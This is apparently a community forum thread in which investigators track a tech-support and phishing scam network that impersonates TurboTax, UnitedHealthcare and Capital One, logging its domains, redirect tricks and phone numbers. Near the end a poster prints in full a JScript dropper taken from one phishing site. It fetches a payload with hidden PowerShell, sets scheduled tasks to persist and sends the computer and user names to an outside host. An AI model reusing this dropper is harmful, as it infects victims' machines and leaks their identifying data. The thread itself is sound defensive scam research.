Now some news: the redirector has changed its target to https://activation.begin.rest/turbotax/
I reported this multi-scam website here:
suspecting that it was a Web InfoTech property. Now there is more evidence.
1 Like
Another thing, kind of a puzzle:
A bunch of this scam groupās impersonation web sites share this āDGā logo
as a favicon and/or elsewhere. It never seems related to the supposed topic of the website (Turbotax, HBO Max, Fidelity investmentsā¦)
What does DG stand for? Is it a clue?
1 Like
Guess what? This same number is also the āsupportā number for the Microsoft mobile phone linking scheme
Phishing page https://akas.prinset.shop/
inevitably leads to the fake error page Phone Link
Associated tawk.to account https://tawk.to/chat/65182c27e6bed319d0048030/1hbj6oupp
These scammers are hungry ā put your phone number in the form on the phishing page and Peter Mam or one of his fellow Support Executives will call you right away on a Saturday. I got a call from Peter Mam on 856-212-1306.
2 Likes
I submitted the phishing page. Sunday.
2 Likes
Hereās what I think is another piece of their Internet infrastructure.
Take for example this fake TurboTax page https://installtaxturbo.com/install-turbotax-with-license-code/
It links to the site Download & Install TurboTaxĆĀ® Desktop 2024-2025 which Iāve noted as a suspected Web Infotech property in a couple other threads, via a redirecting domain, āww0.us.ā
see Fake HP Printer scammer websites - #10 by ElmerFudde2020 for another example.
Now, for the redirection to work, a http parameter has to be passed to ww0.us (after the ā?ā in the URL). The usual parameters Iāve seen seem to be base64-encoded URLs.
However, what about a sort of default or dummy parameter? Is there a default or fallback response?
What if we tried https://ww0.us/?I_AM_A_SCAMMER ?
Guess where it redirects to?
3 Likes
More on ww0.us: Currently Whois records say the domain is administered by a āRoger Wattsā at a very modest residential address in New Jersey (Iām not going to post the exact address because thereās a good chance itās fake and whoever lives there has nothing to do with this).
Registered admin email [email protected] is also the admin for two obvious phishing domains, both registered in January of this year
https://activateuhccom.us/ and https://activateuhc.us/ , both pretending to be United Healthcare, and both of which are probably more scammy than the real UHC which is hard to beat.
The link on the second address uses the ww0.us redirector/obfuscator!
aHR0cHM6Ly9hY3RpdmF0ZXVoYy51cw== is just the originating URL, https://activateuhc.us , in base64.
It redirects to, where else?, a subdirectory of activation.begin.support ā setup your activate.uhc.com (it will return a dummy page unless you access it through the phishing redirector link).
and of course thereās an error, why not! setup your activate.uhc.com
New toll-free number: 855-222-8365. I get the standard āblacklistedā message that I get from Web Infotech numbers when I call from my main research phone.
But wait, thereās more. Up until December 26 of last year, ww0.us was owned by a Salman Khan of Rajasthan, email [email protected] (cool email address Salman!) The other domain registered to that address is a very suspicious https://youtube.gs/
*Note: Salman Khan is the name of a famous Bollywood actor, probably not the same guy! And quite likely not even a real name for one of our scammers, just a little joke from them.
3 Likes
i think the link is changed now!
4 Likes
New website: tx.newredir.com now redirects to Download & Install TurboTaxĆĀ® Desktop 2024-2025 .
So over the course of the month this multi-scam website has moved from activation.begin.rest to activation.begin.support to activation.begin.lat.
5 Likes
If your browser user-agent is set to Chrome on Android, tx.newredir.com once again redirects to https://ts.activatetax.pro/Installation-Error-Contact-Support.php . Probably works for some other browser user agent combos. New toll-free phone number: 855-531-2626.
3 Likes
Via a google search I found another subdirectory of this multi-scam site. This one doesnāt seem to check for referrer, user-agent or http parameters
2 Likes
A new domain I discovered today
The Google Sites page Activate my Capital One card online at Activate.capitalone.com links to
If the browser user agent is a mobile phone variety, it redirects to
https://activation-support.tax-com.com/capitalone/enter-code.php
with the error page https://activation-support.tax-com.com/capitalone/authentication-error.php
new toll-free number: 866-593-3778.
Hereās a spam post thatās a catalogue of related phishing sites, including other subdomains of tax-com.com:
(copy archived at web.archive.org installturbotax | Players list | Bandori Party - BanG Dream! Girls Band Party )
2 Likes
And today this page has another new toll-free number: 855-613-0464.
2 Likes
New toll-free number spotted today: 855-668-8507.
3 Likes
New website and new phone number. The redirect yields the scamming page for Safari/iOS (but oddly, not Chrome/Android).
https://activation-support.tellmenew.com/capitalone/authentication-error.php
855-619-8688
3 Likes
866-217-2243 is active again at https://myefiling.online//Installation-Error-Contact-Support.php .
Update later the same day: a new toll free number, 855-923-3385.
In other news, the old redirecting site tx.newredir.com seems to have finally gone down (for now?) and all their thousands of SEO spam feeder pages are being updated with a new intermediate domain, ts.remdos.com. E.g. Installturbotax.com . Registrar is AppCroNix Infotech Private Limited, d/b/a VEBONIX.com, registered just five days ago.
2 Likes
Update on this: with my browser user agent set to MS Edge on Windows, activateuhc.us directs me via ww0.us to a new phishing domain, setup your activate.uhc.com . After entering my (fake) info, the form sends me to this page:
Which prompts me to download and install a zip-compressed EXE file and run it! Wow that canāt be good. Anyone want to do some analysis on the file?
The parent domain freetechsupport.org returns a bare-bones ātech supportā website with a phone number: 856-240-0005.
Google says 856-240-0005 is also the number for:
- Book Flights Easily with Flights on Deals | Flights on Deals
- fixaprinter - Contect Us
- Contact Dazzling India for Luxurious Travel Experiences | Dazzling India
- Contact us
- Cricut Design Space
- Contact Us - canonoobe.com
- Windows 12 IO - Your Ultimate Guide to Windows 12
- https://www.printer.com.co/
- https://www.roku.cam/
1 Like
So the āEXEā file is not actually a binary file but some kind of Powershell thing that downloads from various URLs ā still very malicious!
var shell = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var localAppData = shell.ExpandEnvironmentStrings("%LOCALAPPDATA%");
var updateBatPath = localAppData + "\\update.bat";
var backupBatPath = localAppData + "\\backup.bat";
var updateBatContent = "@echo off\n";
updateBatContent += "start /min cmd /c PowerShell.exe -WindowStyle Hidden -Command \"Invoke-WebRequest -Uri 'http://dr5.org/in.mp3' -OutFile '" + backupBatPath + "'\"\n";
var updateBatFile = fso.CreateTextFile(updateBatPath, true);
updateBatFile.Write(updateBatContent);
updateBatFile.Close();
function createScheduledTask(taskName, taskTime, taskPath) {
var command = 'SCHTASKS /Create /SC DAILY /TN "' + taskName + '" /TR "' + taskPath + '" /ST ' + taskTime + ' /RU "' + shell.ExpandEnvironmentStrings("%USERNAME%") + '" /F';
shell.Run("cmd /c echo N | " + command, 0, true);
}
createScheduledTask("MyTasks\\1", "11:05", '"' + updateBatPath + '"');
createScheduledTask("MyTasks\\2", "11:06", '"' + backupBatPath + '"');
createScheduledTask("MyTasks\\3", "19:05", '"' + updateBatPath + '"');
createScheduledTask("MyTasks\\4", "19:06", '"' + backupBatPath + '"');
var computerName = shell.ExpandEnvironmentStrings("%COMPUTERNAME%");
var userName = shell.ExpandEnvironmentStrings("%USERNAME%");
var url = "http://l77.org/downloading.php?dl=uhc&id=" + computerName + "_" + userName;
shell.Run("cmd /c start /min " + url, 0, false);
1 Like
So, if you query this URL using a Windows Powershell user-agent string, you get something that isnāt an MP3 file (maybe the extension is to deceive firewalls or antivirus heuristics?) but a Windows shell script. Iām not good at analyzing this but it involves scheduling a bunch of recurring background tasks, and something named Antivirus-Update.bat. Any experts out there who can help decoding this?
Iām trying to paste the code into this comment but Iām getting a ā403 error,ā maybe itās too long or something?
Update: I put the file through hybrid-analysis.com and it says itās the āTrojan.Script.Agent.khixekā aka the AdsExhaust trojan, which supposedly generates fake clicks on pay-per-click ads or something like that?
1 Like